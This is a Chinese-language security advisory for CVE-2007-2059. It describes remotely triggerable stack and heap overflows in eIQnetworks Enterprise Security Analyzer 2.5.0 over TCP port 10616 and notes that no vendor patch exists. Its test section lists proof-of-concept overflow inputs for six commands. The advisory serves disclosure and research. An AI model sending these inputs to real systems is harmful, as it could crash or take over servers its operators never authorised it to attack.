发布日期：2007-04-13
更新日期：2007-04-16

受影响系统：

eIQnetworks Enterprise Security Analyzer 2.5.0

描述：

---

CVE(CAN) ID: CVE-2007-2059

eIQnetworks Enterprise Security Analyzer（ESA）是一款企业级的安全管理平台。

ESA的MainEngine.exe进程在处理各种命令时存在多个溢出漏洞，如果远程攻击者通过10616/TCP端口发送了有超长参数的命令的话，就可能触发这些溢出，导致进程崩溃或完全入侵有漏洞的服务器。

<*来源：Leon Juranic （ljuranic@LSS.hr）
  
  链接：http://secunia.com/advisories/24881/
        http://marc.info/?l=bugtraq&m=117639391921265&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

- DELETESEARCHFOLDER栈溢出
[DELETESEARCHFOLDER&A x 40000...&]

- DELTASK堆溢出
[DELTASK&A x 3000...&current&test&]

- HMGR_CHECKHOSTSCSV堆溢出
[ HMGR_CHECKHOSTSCSV&A x 80000...&]

- TASKUPDATEDUSER堆溢出
[TASKUPDATEDUSER&A x 60000...&test&test&]

- VERIFYUSERKEY远程内存访问破坏
[VERIFYUSERKEY&A x 13000...&Administrator&127.0.0.1&12345]

- VERIFYPWD远程栈溢出（需管理员口令）
[VERIFYPWD&A x 6000...&admin&adminpass&]

建议：

---

厂商补丁：

eIQnetworks
-----------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.eiqnetworks.com/

浏览次数：3159
严重程度：0（网友投票）